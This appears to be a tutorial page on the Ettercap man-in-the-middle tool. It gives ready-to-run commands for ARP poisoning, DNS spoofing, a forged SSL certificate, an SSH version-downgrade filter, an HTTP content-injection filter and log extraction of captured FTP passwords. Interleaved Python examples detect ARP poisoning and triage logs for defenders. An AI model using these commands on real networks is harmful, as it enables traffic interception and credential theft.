Man-in-the-middle attacks: Ettercap
- A unified MITM attack tool
- Forwards packets whose destination MAC is the local host's but whose destination IP is not
- Supports SSH1 and SSL MITM
Module layout
- Sniffer
- MITM
- Filter
- Log
- Plugin
Man-in-the-middle attacks: Sniffer
- Responsible for packet forwarding
- Unified: with a single NIC, performs layer-3 packet forwarding entirely on its own; the kernel's IP_Forward feature is always disabled
- Bridge: a layer-1 MITM mode using two NICs; can act as an IPS and filter packets; cannot be used on a single NIC (it is a transparent bridge)
MITM
- Redirects traffic to the ettercap host
- MITM can also be achieved with other tools, with ettercap used only for sniffing and filtering
Man-in-the-middle attacks: methods of implementing MITM
- ARP
- ICMP: ICMP route redirection, half-duplex
- DHCP: modifies the gateway address, half-duplex
- Switch Port Stealing: floods frames whose destination MAC is the local host and whose source MAC is the victim's; suited to environments with static ARP bindings
- NDP: IPv6 spoofing technique
Man-in-the-middle attacks: constraints on ARP spoofing in kernels 2.4 and later
- An ARP reply that was not requested does not update the local ARP cache
- Ettercap therefore uses ARP request packets for the attack
- Solaris does not update its local ARP cache from ARP packets; Ettercap first sends an ICMP packet to make the target refresh its ARP cache
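The two constraints above matter for detection as much as for the attack: a monitor that only looks for unsolicited ARP replies will not see request-based poisoning. The following detector is an added example (not Ettercap code) that runs over constructed ARP frames; it checks every frame's sender IP-to-MAC binding against what was learned earlier (or against a trusted table for the gateway), in addition to the classic unsolicited-reply test. The MAC and IP values are taken from the transcripts further down this page.

```python
"""Flag ARP cache poisoning in a stream of ARP frames.

Added example, not Ettercap code. The frames below are constructed dicts with
the fields any sniffer exposes: op ('request'/'reply'), sha/spa (sender MAC/IP)
and tha/tpa (target MAC/IP). Because Ettercap can poison with ARP requests and
nudges caches with ICMP first, a detector that only watches for unsolicited
replies misses it; this one also checks each frame's sender IP->MAC binding.
"""
from collections import defaultdict


def detect_arp_poison(frames, trusted=None, max_ips=1):
    """Return a list of alert strings for the given frames.

    trusted : optional {ip: mac} of known-good bindings (e.g. the gateway).
    max_ips : how many distinct IPs one MAC may legitimately advertise.
    """
    bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    pending = set()                 # (asker_ip, asked_ip) of requests seen
    ips_per_mac = defaultdict(set)  # mac -> IPs it has claimed as sender
    alerts = []

    for f in frames:
        sha, spa, tpa = f["sha"].lower(), f["spa"], f["tpa"]

        if f["op"] == "request":
            # Note: a forged request also plants a 'pending' entry, so the
            # unsolicited-reply test alone is only advisory.
            pending.add((spa, tpa))
        elif f["op"] == "reply":
            # A legitimate reply answers a request the target sent for spa.
            if (tpa, spa) in pending:
                pending.discard((tpa, spa))
            else:
                alerts.append(f"UNSOLICITED_REPLY {spa} is-at {sha} sent to {tpa}")

        # The binding check runs for requests and replies alike.
        known = bindings.get(spa)
        if known is None:
            bindings[spa] = sha
        elif known != sha:
            alerts.append(f"CONFLICT {spa} was {known}, now claimed by {sha}")

        ips_per_mac[sha].add(spa)
        if len(ips_per_mac[sha]) == max_ips + 1:
            alerts.append(f"MULTI_IP {sha} now claims {sorted(ips_per_mac[sha])}")

    return alerts


# Constructed frames; addresses are the ones in this page's transcripts, where
# 192.168.1.110 is the ettercap host and 192.168.1.1 / 192.168.1.114 the targets.
GATEWAY, VICTIM, ETTERCAP = "14:75:90:21:4f:56", "78:92:9c:03:6f:18", "08:00:27:db:b2:af"
SAMPLE_FRAMES = [
    # 1-2: normal resolution of the gateway by the victim
    {"op": "request", "sha": VICTIM, "spa": "192.168.1.114", "tha": "ff:ff:ff:ff:ff:ff", "tpa": "192.168.1.1"},
    {"op": "reply", "sha": GATEWAY, "spa": "192.168.1.1", "tha": VICTIM, "tpa": "192.168.1.114"},
    # 3: a reply nobody asked for, claiming the gateway IP with the ettercap MAC
    {"op": "reply", "sha": ETTERCAP, "spa": "192.168.1.1", "tha": VICTIM, "tpa": "192.168.1.114"},
    # 4: request-based poisoning of the gateway side: no reply to be seen at all
    {"op": "request", "sha": ETTERCAP, "spa": "192.168.1.114", "tha": GATEWAY, "tpa": "192.168.1.1"},
]


if __name__ == "__main__":
    for alert in detect_arp_poison(SAMPLE_FRAMES, trusted={"192.168.1.1": GATEWAY}):
        print(alert)
```

Frame 4 produces no UNSOLICITED_REPLY alert at all; it is caught only because the binding for 192.168.1.114 had already been learned from frame 1, which is why a trusted table for the gateway (or a switch's DHCP-snooping binding table) is the more robust input.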
Man-in-the-middle attacks: user interfaces
- -T  text interface
- -G  graphical interface
- -C  text-based (curses) graphical interface
- -D  daemon mode
Specifying targets
- IPv4: MAC/IPs/Ports
- IPv6: MAC/IPs/IPv6/Ports
- /10.0.0.1-5;10.0.1.33/20-25,80,110
root@k:~# ettercap -T
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 00:0C:29:DB:CD:FC
fe80::20c:29ff:fedb:cdfc/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 65534 EGID 65534...
33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Randomizing -1 hosts for scanning...
Scanning the whole netmask for -1 hosts...
Fri May 13 22:57:16 2016 [550658]
fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)
0 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Fri May 13 22:57:20 2016 [551628]
fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)
root@k:~# ettercap -G
root@k:~# ettercap -C
root@k:~# ettercap -D
root@k:~# ettercap 00:11:11:11:11:11 /1.1.1.1-10;11/25,80,21 /1.1.1.2/
Man-in-the-middle attacks: privileges
- Root is needed to open a link-layer socket; afterwards ettercap runs as the nobody account
- The log directory must be writable by nobody
- Change this in etter.conf: EC_UID=65534
SSL MITM based on a forged certificate
- Bridge mode does not support SSL MITM
- openssl genrsa -out etter.ssl.crt 1024
- openssl req -new -key etter.ssl.crt -out tmp.csr
- openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.new
- cat tmp.new >> etter.ssl.crt
- rm -f tmp.new tmp.csr
root@k:~# vi /etc/ettercap/etter.conf // main configuration file
############################################################################
# #
# ettercap -- etter.conf -- configuration file #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# #
############################################################################
[privs]
ec_uid = 65534 # nobody is the default
ec_gid = 65534 # nobody is the default
[mitm]
arp_storm_delay = 10 # milliseconds
arp_poison_smart = 0 # boolean
arp_poison_warm_up = 1 # seconds
arp_poison_delay = 10 # seconds
arp_poison_icmp = 1 # boolean
arp_poison_reply = 1 # boolean
arp_poison_request = 0 # boolean
arp_poison_equal_mac = 1 # boolean
dhcp_lease_time = 1800 # seconds
port_steal_delay = 10 # seconds
port_steal_send_delay = 2000 # microseconds
ndp_poison_warm_up = 1 # seconds
ndp_poison_delay = 5 # seconds
ndp_poison_send_delay = 1500 # microseconds
ndp_poison_icmp = 1 # boolean
ndp_poison_equal_mac = 1 # boolean
icmp6_probe_delay = 3 # seconds
[connections]
connection_timeout = 300 # seconds
connection_idle = 5 # seconds
connection_buffer = 10000 # bytes
connect_timeout = 5 # seconds
[stats]
sampling_rate = 50 # number of packets
[misc]
close_on_eof = 1 # boolean value
store_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remote
aggressive_dissectors = 1 # boolean value
skip_forwarded_pcks = 1 # boolean value
checksum_check = 0 # boolean value
submit_fingerprint = 0 # boolean value (set if you want ettercap to submit unknown fingerprints)
checksum_warning = 0 # boolean value (valid only if checksum_check is 1)
sniffing_at_startup = 1 # boolean value
#######################################################################
#
# You can specify what DISSECTORS are to be enabled or not...
#
# e.g.: ftp = 21 enabled on port 21 (tcp is implicit)
# ftp = 2345 enabled on non standard port
# ftp = 21,453 enabled on port 21 and 453
# ftp = 0 disabled
# NOTE: some dissectors have multiple default ports, if you specify a new
# one, all the default ports will be overwritten
#dissector default port
[dissectors]
ftp = 21 # tcp 21
ssh = 22 # tcp 22
telnet = 23 # tcp 23
smtp = 25 # tcp 25
dns = 53 # udp 53
dhcp = 67 # udp 68
http = 80 # tcp 80
ospf = 89 # ip 89 (IPPROTO 0x59)
pop3 = 110 # tcp 110
#portmap = 111 # tcp / udp
vrrp = 112 # ip 112 (IPPROTO 0x70)
nntp = 119 # tcp 119
smb = 139,445 # tcp 139 445
imap = 143,220 # tcp 143 220
snmp = 161 # udp 161
bgp = 179 # tcp 179
ldap = 389 # tcp 389
https = 443 # tcp 443
ssmtp = 465 # tcp 465
rlogin = 512,513 # tcp 512 513
rip = 520 # udp 520
nntps = 563 # tcp 563
ldaps = 636 # tcp 636
telnets = 992 # tcp 992
imaps = 993 # tcp 993
ircs = 994 # tcp 994
pop3s = 995 # tcp 995
socks = 1080 # tcp 1080
radius = 1645,1646 # udp 1645 1646
msn = 1863 # tcp 1863
cvs = 2401 # tcp 2401
mysql = 3306 # tcp 3306
icq = 5190 # tcp 5190
ymsg = 5050 # tcp 5050
mdns = 5353 # udp 5353
vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903
x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003
irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669
gg = 8074 # tcp 8074
proxy = 8080 # tcp 8080
rcon = 27015,27960 # udp 27015 27960
ppp = 34827 # special case ;) this is the Net Layer code
TN3270 = 23,992 # tcp 23 992
#
# you can change the colors of the curses GUI.
# here is a list of values:
# 0 Black 4 Blue
# 1 Red 5 Magenta
# 2 Green 6 Cyan
# 3 Yellow 7 White
#
[curses]
color_bg = 0
color_fg = 7
color_join1 = 2
color_join2 = 4
color_border = 7
color_title = 3
color_focus = 6
color_menu_bg = 4
color_menu_fg = 6
color_window_bg = 4
color_window_fg = 7
color_selection_bg = 6
color_selection_fg = 6
color_error_bg = 1
color_error_fg = 3
color_error_border = 3
#
# This section includes all the configurations that need a string as a
# parameter such as the redirect command for SSL mitm attack.
#
[strings]
# the default encoding to be used for the UTF-8 visualization
utf8_encoding = "ISO-8859-1"
# the command used by the remote_browser plugin
remote_browser = "xdg-open http://%host%url"
#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: the script must fit into one line with a maximum of 255 characters
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#---------------
# Mac Os X
#---------------
# quick and dirty way:
#redir_command_on = "ipfw -q add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"
#redir_command_off = "ipfw -q delete set %set"
# a better solution is to use a script that keeps track of the rules inserted
# and then deletes them on exit:
# redir_command_on:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
# ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3
# else
# ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules
# fi
# ----- cut here -------
# redir_command_off:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
# ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`
# rm -f /tmp/osx_ipfw_rules
# fi
# ----- cut here -------
#---------------
# FreeBSD
#---------------
# Before PF can be used, make sure the kernel module has been loaded by
# `kldstat | grep pf.ko`. If the result is empty, you can load it by
# `kldload pf.ko` or add 'pf_enable="YES"' to the /etc/rc.conf and reboot.
# Check if the PF status is enabled by
# `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with
# `pfctl -e`.
#redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to any port %port -> localhost port %rport') | pfctl -f - 2> /dev/null"
#redir_command_off = "pfctl -Psn 2> /dev/null | grep -v %port | pfctl -f - 2> /dev/null"
#---------------
# Open BSD
#---------------
# unfortunately the pfctl command does not accept direct rule adding
# you have to use a script which executes the following command:
# ----- cut here -------
# #!/bin/sh
# rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f -
# ----- cut here -------
# it's important to remember that you need "rdr-anchor sslsniff" in your
# pf.conf in the TRANSLATION section.
#redir_command_on = "the_script_described_above %iface %port %rport"
#redir_command_off = "pfctl -a sslsniff -Fn"
# also, if you create a group called "pfusers" and have EC_GID be that group,
# you can do something like:
# chgrp pfusers /dev/pf
# chmod g+rw /dev/pf
# such that all users in "pfusers" can run pfctl commands; thus allowing non-root
# execution of redir commands.
##########
# EOF #
##########
ARP MITM
Text mode
- ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message
Graphical interface
SSL MITM
- vi /etc/ettercap/etter.conf
DNS spoofing
- Configuration file of the dns_spoof plugin
- vi /etc/ettercap/etter.dns
root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall -m message
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 08:00:27:DB:B2:AF
192.168.1.110/255.255.255.0
fe80::a00:27ff:fedb:b2af/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |======================================================>| 100.00%
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 14:75:90:21:4F:56
GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18
Starting Unified sniffing
Text only Interface activated ...
Hit 'h' for inline help
FTP : 74.81.178.167:21 -> USER: user123 PASS: password123
root@k:~# ettercap -T -M arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall.ecp logall.ecp logall.ecp.eci logall.ecp.ecp
root@k:~# gedit /etc/ettercap/etter.conf
root@k:~# gedit /etc/ettercap/etter.dns
#######################################################################
# #
# ettercap -- etter.dns -- host file for dns_spoof plugin #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
#######################################################################
# #
# Sample hosts file for dns_spoof plugin #
# #
# the format is (for A query): #
# www.myhostname.com A 168.11.22.33 #
# *.foo.com A 168.44.55.66 #
# #
# ... for a AAAA query (same hostname allowed): #
# www.myhostname.com AAAA 2001:db8::1 #
# *.foo.com AAAA 2001:db8::2 #
# #
# or to skip a protocol family (useful with dual-stack): #
# www.hotmail.com AAAA :: #
# www.yahoo.com A 0.0.0.0 #
# or for PTR query: #
# www.bar.com PTR 10.0.0.10 #
# www.google.com PTR ::1 #
#
# or for MX query (either IPv4 or IPv6): #
# domain.com MX xxx.xxx.xxx.xxx #
# domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx #
# domain3.com MX xxxx:xxxx::y #
#
# or for WINS query: #
# workgroup WINS 127.0.0.1 #
# PC* WINS 127.0.0.1 #
# #
# or for SRV query (either IPv4 or IPv6): #
# service._tcp|_udp.domain SRV 192.168.1.10:port #
# service._tcp|_udp.domain SRV [2001:db8::3]:port #
# #
# or for TXT query (value must be wrapped in double quotes): #
# google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all" #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the www.microsoft.com example) #
# #
#######################################################################
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 192.168.1.1
*.microsoft.com A 162.168.1.1
www.microsoft.com PTR 192.168.1.1 # Wildcards in PTR are not allowed
##########################################
# no one out there can have our domains...
#
www.alor.org A 127.0.0.1
www.naga.org A 127.0.0.1
www.naga.org AAAA 2001:db8::2
##########################################
# dual stack enabled hosts does not make life easy
# force them back to single stack
www.ietf.org A 127.0.0.1
www.ietf.org AAAA ::
www.example.org A 0.0.0.0
www.example.org AAAA ::1
###############################################
# one day we will have our ettercap.org domain
#
www.ettercap.org A 127.0.0.1
www.ettercap-project.org A 127.0.0.1
ettercap.sourceforge.net A 23.235.43.133
www.ettercap.org PTR ::1
###############################################
# some MX examples
#
alor.org MX 127.0.0.1
naga.org MX 127.0.0.1
example.org MX 127.0.0.2
microsoft.com MX 2001:db8::1ce:c01d:bee3
###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
LAB-PC* WINS 127.0.0.1
###############################################
# some service discovery examples
xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269
ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389
###############################################
# little example for TXT records
#
naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all"
# vim:ts=8:noexpandtab
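The header of etter.dns documents the record types, the '*' wildcard and the rule that wildcards never answer PTR queries. The parser below is an added example, not the dns_spoof plugin's code; it reads a file in that format and answers forward and reverse queries the way the header describes, and lists the entries ('A 0.0.0.0', 'AAAA ::') that only suppress one address family. The sample file embedded in it is constructed and uses documentation addresses. A responder who recovers an etter.dns can run it to enumerate exactly which names would have been answered and with what.

```python
"""Parse an etter.dns host file and answer queries the way its header documents.

Added example, not the dns_spoof plugin's code. Record types are kept as strings,
'*' wildcards apply to every type except PTR, and TXT values keep their quoted text.
"""
import fnmatch
import shlex

# Constructed sample in etter.dns format (not the file shipped with ettercap).
SAMPLE_ETTER_DNS = """
# constructed sample
example.org            A     192.0.2.10
*.example.org          A     192.0.2.20
www.example.org        PTR   192.0.2.10   # wildcards are not allowed in PTR
www.ietf.org           A     127.0.0.1
www.ietf.org           AAAA  ::           # skip the IPv6 family
example.org            MX    192.0.2.25
LAB-PC*                WINS  127.0.0.1
xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269
example.org            TXT   "v=spf1 ip4:192.0.2.0/24 -all"
"""

FAMILY_SKIP = {"0.0.0.0", "::"}


def parse_etter_dns(text):
    """Return a list of (name, type, value) tuples; comments and blanks are skipped."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        tokens = shlex.split(raw, comments=True)  # handles '#' and "quoted TXT"
        if not tokens:
            continue
        if len(tokens) != 3:
            raise ValueError(f"line {lineno}: expected NAME TYPE VALUE, got {raw!r}")
        name, rtype, value = tokens
        records.append((name, rtype.upper(), value))
    return records


def resolve(records, qname, qtype):
    """Value answered for a forward query, or None. Exact names beat wildcards."""
    q, t = qname.lower(), qtype.upper()
    wildcard_hit = None
    for name, rtype, value in records:
        if rtype != t or rtype == "PTR":   # PTR is keyed by address, see reverse()
            continue
        n = name.lower()
        if n == q:
            return value
        if "*" in n and wildcard_hit is None and fnmatch.fnmatchcase(q, n):
            wildcard_hit = value
    return wildcard_hit


def reverse(records, ip):
    """Name answered for a PTR query on `ip`; wildcard names never match."""
    for name, rtype, value in records:
        if rtype == "PTR" and "*" not in name and value == ip:
            return name
    return None


def family_skips(records):
    """Entries whose only effect is to suppress one address family."""
    return [(n, t) for n, t, v in records if t in ("A", "AAAA") and v in FAMILY_SKIP]


if __name__ == "__main__":
    recs = parse_etter_dns(SAMPLE_ETTER_DNS)
    print(resolve(recs, "ftp.example.org", "A"), reverse(recs, "192.0.2.10"), family_skips(recs))
```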
----------------------------------------------------------------------------
ettercap 0.8.2 ----->Plugins----->manage the plugins----->dns_spoof (double-click)
root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -p dns_spoof
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 08:00:27:DB:B2:AF
192.168.1.110/255.255.255.0
fe80::a00:27ff:fedb:b2af/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |======================================================>| 100.00%
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 14:75:90:21:4F:56
GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18
Starting Unified sniffing
Text only Interface activated ...
Hit 'h' for inline help
ARP MITM: viewing Ettercap logs
- etterlog -p log.eci   view the captured passwords
- etterlog -c log.ecp   list the connections in the log
- etterlog -c -f /1.1.1.1/ log.ecp
- etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa   select the matching connection and extract the transferred file
root@k:~# etterlog -p logall.ect
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Log file version : 0.8.2
Timestamp : Thu May 5 23:56:43 2016 [619991]
Type : LOG_INFO
74.91.178.167 TCP 21 USER: user123 PASS: password123
root@k:~# etterlog -c logall.ecp.ecp
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Log file version : 0.8.2
Timestamp : Thu May 5 23:56:43 2016 [619991]
Type : LOG_INFO
Creating the connection table...
Found 2 connection...
TCP: 192.168.1.114:51700 <--> 74.91.178.167:21
TCP: 192.168.1.114:51788 <--> 74.91.178.167:21
root@k:~# etterlog -c logall.ecp
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Log file version : 0.8.2
Timestamp : Thu May 5 23:56:43 2016 [619991]
Type : LOG_INFO
Creating the connection table...
Found 10 connection...
TCP: 192.168.1.114:51977 <--> 13.67.53.38:443
TCP: 192.168.1.114:51798 <--> 58.250.11.124:8080
TCP: 192.168.1.114:51797 <--> 58.250.11.124:8080
TCP: 192.168.1.114:55285 <--> 124.207.160.106:53
TCP: 192.168.1.114:51796 <--> 119.147.21.204:443
TCP: 192.168.1.114:49327 <--> 124.207.160.106:53
TCP: 192.168.1.114:51795 <--> 74.91.178.167:21
TCP: 192.168.1.114:51791 <--> 74.91.178.167:21
TCP: 192.168.1.114:51794 <--> 14.215.152.238:443
TCP: 192.168.1.114:57885 <--> 224.0.0.252:5355
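When an .ecp log like the one above is recovered during an incident, the first questions are which services the victim reached through the interposed host and which of them carried credentials in cleartext. The triage helper below is an added example, not etterlog's code; it parses the 'TCP: a:p <--> b:q' connection lines that `etterlog -c` prints (the embedded sample is constructed in the same shape as the output on this page) and classifies them by destination service.

```python
"""Triage the connection table printed by `etterlog -c`.

Added example, not etterlog's code. Parses 'PROTO: src:port <--> dst:port' lines,
counts connections per destination service and lists the ones whose protocol
sends credentials unencrypted on its default port.
"""
import re
from collections import Counter

CONN_RE = re.compile(r"^(TCP|UDP): (\S+):(\d+) <--> (\S+):(\d+)$")

# Services whose logins cross the wire unencrypted on their default port.
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 80: "http", 110: "pop3", 143: "imap"}

# Constructed sample in the shape of this page's etterlog output.
SAMPLE_ETTERLOG = """\
Creating the connection table...
Found 5 connection...
TCP: 192.168.1.114:51977 <--> 13.67.53.38:443
TCP: 192.168.1.114:55285 <--> 124.207.160.106:53
TCP: 192.168.1.114:51795 <--> 74.91.178.167:21
TCP: 192.168.1.114:51791 <--> 74.91.178.167:21
TCP: 192.168.1.114:57885 <--> 224.0.0.252:5355
"""


def parse_connections(text):
    """Yield (proto, src_ip, src_port, dst_ip, dst_port) for each table line."""
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            proto, sip, sport, dip, dport = m.groups()
            yield proto, sip, int(sport), dip, int(dport)


def services_by_destination(text):
    """Counter of (dst_ip, dst_port) -> number of connections."""
    return Counter((dip, dport) for _, _, _, dip, dport in parse_connections(text))


def cleartext_exposures(text):
    """Connections to services where a login would have been readable in transit."""
    return [
        (sip, dip, dport, CLEARTEXT_PORTS[dport])
        for _, sip, _, dip, dport in parse_connections(text)
        if dport in CLEARTEXT_PORTS
    ]


if __name__ == "__main__":
    print(services_by_destination(SAMPLE_ETTERLOG).most_common())
    print(cleartext_exposures(SAMPLE_ETTERLOG))
```

The FTP sessions are exactly the ones whose USER/PASS pairs appear in the `etterlog -p` output above; the remediation list that falls out of `cleartext_exposures` (move FTP to SFTP/FTPS, reset the exposed accounts) is what the responder needs.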
ARP MITM: Filter
- /usr/share/ettercap/   SSH-2.xx / SSH-1.99 / SSH-1.51
- etterfilter etter.filter.ssh -o ssh.ef
Replacing HTTP content
if (ip.proto == TCP && tcp.src == 80) {
    msg("data on TCP 80\n");
    replace("img src=", "img src=\"http://1.1.1.1/1.gif\"");
    replace("IMG src=", "img src=\"http://1.1.1.1/1.gif\"");
    replace("IMG SRC=", "img src=\"http://1.1.1.1/1.gif\"");
}
root@k:~# cd /usr/share/ettercap
root@k:/usr/share/ettercap# ls
AUTHORS etter.fields etter.filter.pcre etterlog.dtd
doc etter.filter etter.filter.ssh etter.mime
ettercap.png etterfilter.cnt etterfilter.tbl etter.services
ettercap-small.png etter.filter.examples etter.finger.mac etter.ssl.crt
ettercap.svg etter.filter.kill etter.finger.os lua
root@k:~# gedit etter.filter.ssh
############################################################################
# #
# ettercap -- etter.filter -- filter source file #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
##
#
# This filter will substitute the SSH server response from SSH-1.99 to
# SSH-1.51, so if the server supports both ssh1 and ssh2 we will force
# it to use ssh1... ;)
# server response : SSH-2.00 only ssh2 supported
# SSH-1.99 both ssh1 and ssh2 supported
# SSH-1.51 only ssh1 supported
##
if (ip.proto == TCP) {
if (tcp.src == 22) {
if ( replace("SSH-1.99", "SSH-1.51") ) {
msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
} else {
if ( search(DATA.data, "SSH-2.00") ) {
msg("[SSH Filter] Server supports only SSH version 2\n");
} else {
if ( search(DATA.data, "SSH-1.51") ) {
msg("[SSH Filter] Server already supports only version 1\n");
}
}
}
}
}
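The filter above works only because SSH-1.99 is a promise to speak either protocol: rewriting it to SSH-1.51 tells a client that still accepts protocol 1 to fall back, while a client pinned to protocol 2 must disconnect (RFC 4253 section 5.1). The model below is an added example, not Ettercap code; the banners are constructed. It applies the filter's single replace() rule to a banner and shows which client configurations are downgraded and which are not, plus the simple client-side comparison against a previously recorded banner that would expose the change.

```python
"""Model the SSH version exchange (RFC 4253 section 5.1) and the effect of the
SSH-1.99 -> SSH-1.51 rewrite that etter.filter.ssh performs on the server banner.

Added example, not Ettercap code; all banners are constructed.
"""
import re

BANNER_RE = re.compile(r"^SSH-(\d+\.\d+)-(\S+)")


def parse_banner(banner):
    """'SSH-1.99-OpenSSH_5.3' -> ('1.99', 'OpenSSH_5.3')."""
    m = BANNER_RE.match(banner)
    if not m:
        raise ValueError(f"not an SSH identification string: {banner!r}")
    return m.group(1), m.group(2)


def server_protocols(protoversion):
    """Protocol majors a server announces: '1.99' means both 1 and 2."""
    if protoversion == "1.99":
        return {"1", "2"}
    major = protoversion.split(".")[0]
    if major in ("1", "2"):
        return {major}
    raise ValueError(f"unknown protoversion {protoversion!r}")


def negotiate(client_allows, server_banner):
    """Protocol the client continues with ('2' or '1'), or None if it must disconnect."""
    protoversion, _ = parse_banner(server_banner)
    common = server_protocols(protoversion) & set(client_allows)
    if "2" in common:
        return "2"
    if "1" in common:
        return "1"
    return None


def apply_ssh_filter(payload):
    """The single replace() rule from etter.filter.ssh, applied to the banner packet."""
    return payload.replace("SSH-1.99", "SSH-1.51")


def banner_changed(expected, observed):
    """Client-side check against the banner recorded for this host on an earlier,
    trusted session (constructed 'known banner' store)."""
    return parse_banner(expected) != parse_banner(observed)


if __name__ == "__main__":
    banner = "SSH-1.99-OpenSSH_5.3"
    print("client allowing 1 and 2:", negotiate({"1", "2"}, banner),
          "->", negotiate({"1", "2"}, apply_ssh_filter(banner)))
    print("client pinned to 2:", negotiate({"2"}, apply_ssh_filter(banner)))
```

The two mitigations fall out directly: servers should announce SSH-2.0 rather than SSH-1.99 (no protocol 1 support at all), and clients should refuse protocol 1, so that the rewritten banner yields a disconnect instead of a downgraded session.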
root@k:~# etterfilter etter.filter.ssh -o ssh.ef
root@k:/usr/share/ettercap# etterfilter etter.filter.ssh -o ssh.ef
etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team
14 protocol tables loaded:
DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth
13 constants loaded:
VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP
Parsing source file 'etter.filter.ssh' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
